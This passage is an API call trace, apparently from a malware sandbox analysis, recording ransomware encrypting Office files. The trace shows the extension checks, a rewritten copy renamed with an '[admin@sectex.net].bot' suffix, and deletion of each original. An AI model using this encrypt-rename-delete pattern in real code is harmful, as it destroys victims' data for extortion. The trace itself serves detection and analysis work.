	[0160.328] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.328] lstrlenW (lpString=".zip") returned 4
	[0160.328] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.328] lstrlenW (lpString=".rar") returned 4
	[0160.329] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.329] lstrlenW (lpString=".bz2") returned 4
	[0160.329] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.329] lstrlenW (lpString=".7z") returned 3
	[0160.329] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.329] lstrlenW (lpString=".dbf") returned 4
	[0160.329] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.329] lstrlenW (lpString=".1cd") returned 4
	[0160.329] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\APPT.CFG") returned 62
	[0160.329] lstrlenW (lpString=".jpg") returned 4
	[0160.329] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.329] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.329] lstrlenW (lpString="DISTLSTL.ICO") returned 12
	[0160.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlstl.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0160.681] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=1078) returned 1
	[0160.681] CloseHandle (hObject=0x25c) returned 1
	[0160.681] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlstl.ico")) returned 0x20
	[0160.709] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlstl.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlstl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0160.799] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.799] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlstl.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.190] GetLastError () returned 0x0
	[0161.190] ReadFile (in: hFile=0x398, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x436, lpOverlapped=0x0) returned 1
	[0161.192] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0161.193] ReadFile (in: hFile=0x398, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.193] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.193] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.193] CloseHandle (hObject=0x3c4) returned 1
	[0161.193] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.193] SetEndOfFile (hFile=0x398) returned 1
	[0161.195] CloseHandle (hObject=0x398) returned 1
	[0161.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.197] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlstl.ico")) returned 1
	[0161.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.203] lstrlenW (lpString=".doc") returned 4
	[0161.203] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.203] lstrlenW (lpString=".docx") returned 5
	[0161.203] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.203] lstrlenW (lpString=".pdf") returned 4
	[0161.203] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.203] lstrlenW (lpString=".xls") returned 4
	[0161.203] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.203] lstrlenW (lpString=".xlsx") returned 5
	[0161.203] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.203] lstrlenW (lpString=".ppt") returned 4
	[0161.203] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.203] lstrlenW (lpString=".zip") returned 4
	[0161.203] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.203] lstrlenW (lpString=".rar") returned 4
	[0161.203] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.203] lstrlenW (lpString=".bz2") returned 4
	[0161.203] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.203] lstrlenW (lpString=".7z") returned 3
	[0161.203] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.203] lstrlenW (lpString=".dbf") returned 4
	[0161.203] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.203] lstrlenW (lpString=".1cd") returned 4
	[0161.203] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.203] lstrlenW (lpString=".jpg") returned 4
	[0161.203] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.204] lstrlenW (lpString=".doc") returned 4
	[0161.204] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.204] lstrlenW (lpString=".docx") returned 5
	[0161.204] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0161.204] lstrlenW (lpString=".pdf") returned 4
	[0161.204] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.204] lstrlenW (lpString=".xls") returned 4
	[0161.204] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.204] lstrlenW (lpString=".xlsx") returned 5
	[0161.204] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0161.204] lstrlenW (lpString=".ppt") returned 4
	[0161.204] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.204] lstrlenW (lpString=".zip") returned 4
	[0161.204] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.204] lstrlenW (lpString=".rar") returned 4
	[0161.204] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.204] lstrlenW (lpString=".bz2") returned 4
	[0161.204] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.204] lstrlenW (lpString=".7z") returned 3
	[0161.204] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.204] lstrlenW (lpString=".dbf") returned 4
	[0161.204] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.204] lstrlenW (lpString=".1cd") returned 4
	[0161.204] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLSTL.ICO") returned 66
	[0161.204] lstrlenW (lpString=".jpg") returned 4
	[0161.204] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.205] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0161.205] lstrlenW (lpString="MMSS.ICO") returned 8
	[0161.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmss.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.206] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2238) returned 1
	[0161.206] CloseHandle (hObject=0x3c4) returned 1
	[0161.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmss.ico")) returned 0x20
	[0161.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmss.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmss.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.207] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.207] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmss.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0161.208] GetLastError () returned 0x0
	[0161.208] ReadFile (in: hFile=0x3c4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x8be, lpOverlapped=0x0) returned 1
	[0161.211] WriteFile (in: hFile=0x37c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x8c0, lpOverlapped=0x0) returned 1
	[0161.213] ReadFile (in: hFile=0x3c4, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.213] WriteFile (in: hFile=0x37c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.213] SetEndOfFile (hFile=0x37c) returned 1
	[0161.213] CloseHandle (hObject=0x37c) returned 1
	[0161.213] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.213] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.215] CloseHandle (hObject=0x3c4) returned 1
	[0161.215] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.215] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\mmss.ico")) returned 1
	[0161.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.216] lstrlenW (lpString=".doc") returned 4
	[0161.216] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.216] lstrlenW (lpString=".docx") returned 5
	[0161.216] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.216] lstrlenW (lpString=".pdf") returned 4
	[0161.216] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.216] lstrlenW (lpString=".xls") returned 4
	[0161.216] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.216] lstrlenW (lpString=".xlsx") returned 5
	[0161.216] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.216] lstrlenW (lpString=".ppt") returned 4
	[0161.216] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.216] lstrlenW (lpString=".zip") returned 4
	[0161.216] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.216] lstrlenW (lpString=".rar") returned 4
	[0161.216] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.216] lstrlenW (lpString=".bz2") returned 4
	[0161.216] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.217] lstrlenW (lpString=".7z") returned 3
	[0161.217] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.217] lstrlenW (lpString=".dbf") returned 4
	[0161.217] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.217] lstrlenW (lpString=".1cd") returned 4
	[0161.217] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.217] lstrlenW (lpString=".jpg") returned 4
	[0161.217] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.217] lstrlenW (lpString=".doc") returned 4
	[0161.217] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0161.217] lstrlenW (lpString=".docx") returned 5
	[0161.217] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0161.217] lstrlenW (lpString=".pdf") returned 4
	[0161.217] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0161.217] lstrlenW (lpString=".xls") returned 4
	[0161.217] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0161.217] lstrlenW (lpString=".xlsx") returned 5
	[0161.217] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0161.217] lstrlenW (lpString=".ppt") returned 4
	[0161.217] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0161.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.218] lstrlenW (lpString=".zip") returned 4
	[0161.218] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0161.218] lstrlenW (lpString=".rar") returned 4
	[0161.218] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0161.218] lstrlenW (lpString=".bz2") returned 4
	[0161.218] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0161.218] lstrlenW (lpString=".7z") returned 3
	[0161.218] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0161.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.218] lstrlenW (lpString=".dbf") returned 4
	[0161.218] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0161.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.218] lstrlenW (lpString=".1cd") returned 4
	[0161.218] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0161.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\MMSS.ICO") returned 62
	[0161.218] lstrlenW (lpString=".jpg") returned 4
	[0161.218] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0161.218] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0161.218] lstrlenW (lpString="NOTE.CFG") returned 8
	[0161.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\note.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.231] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=781) returned 1
	[0161.241] CloseHandle (hObject=0x3c4) returned 1
	[0161.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\note.cfg")) returned 0x20
	[0161.241] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\note.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\note.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.249] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.249] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.249] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\note.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0161.250] GetLastError () returned 0x0
	[0161.250] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x30d, lpOverlapped=0x0) returned 1
	[0161.251] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x310, lpOverlapped=0x0) returned 1
	[0161.252] ReadFile (in: hFile=0x3f0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.252] WriteFile (in: hFile=0x3c4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.252] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.252] CloseHandle (hObject=0x3c4) returned 1
	[0161.253] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.253] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.254] CloseHandle (hObject=0x3f0) returned 1
	[0161.255] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.255] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\note.cfg")) returned 1
	[0161.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.255] lstrlenW (lpString=".doc") returned 4
	[0161.256] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.256] lstrlenW (lpString=".docx") returned 5
	[0161.256] lstrcmpiW (lpString1=".docx", lpString2="E.CFG") returned -1
	[0161.256] lstrlenW (lpString=".pdf") returned 4
	[0161.256] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.256] lstrlenW (lpString=".xls") returned 4
	[0161.256] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.256] lstrlenW (lpString=".xlsx") returned 5
	[0161.256] lstrcmpiW (lpString1=".xlsx", lpString2="E.CFG") returned -1
	[0161.256] lstrlenW (lpString=".ppt") returned 4
	[0161.256] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.256] lstrlenW (lpString=".zip") returned 4
	[0161.256] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.256] lstrlenW (lpString=".rar") returned 4
	[0161.256] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.256] lstrlenW (lpString=".bz2") returned 4
	[0161.256] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.256] lstrlenW (lpString=".7z") returned 3
	[0161.256] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.256] lstrlenW (lpString=".dbf") returned 4
	[0161.256] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.256] lstrlenW (lpString=".1cd") returned 4
	[0161.256] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.256] lstrlenW (lpString=".jpg") returned 4
	[0161.256] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.256] lstrlenW (lpString=".doc") returned 4
	[0161.257] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.257] lstrlenW (lpString=".docx") returned 5
	[0161.257] lstrcmpiW (lpString1=".docx", lpString2="E.CFG") returned -1
	[0161.257] lstrlenW (lpString=".pdf") returned 4
	[0161.257] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.257] lstrlenW (lpString=".xls") returned 4
	[0161.257] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.257] lstrlenW (lpString=".xlsx") returned 5
	[0161.257] lstrcmpiW (lpString1=".xlsx", lpString2="E.CFG") returned -1
	[0161.257] lstrlenW (lpString=".ppt") returned 4
	[0161.257] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\NOTE.CFG") returned 62
	[0161.257] lstrlenW (lpString=".zip") returned 4
	[0161.257] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.257] lstrlenW (lpString=".rar") returned 4
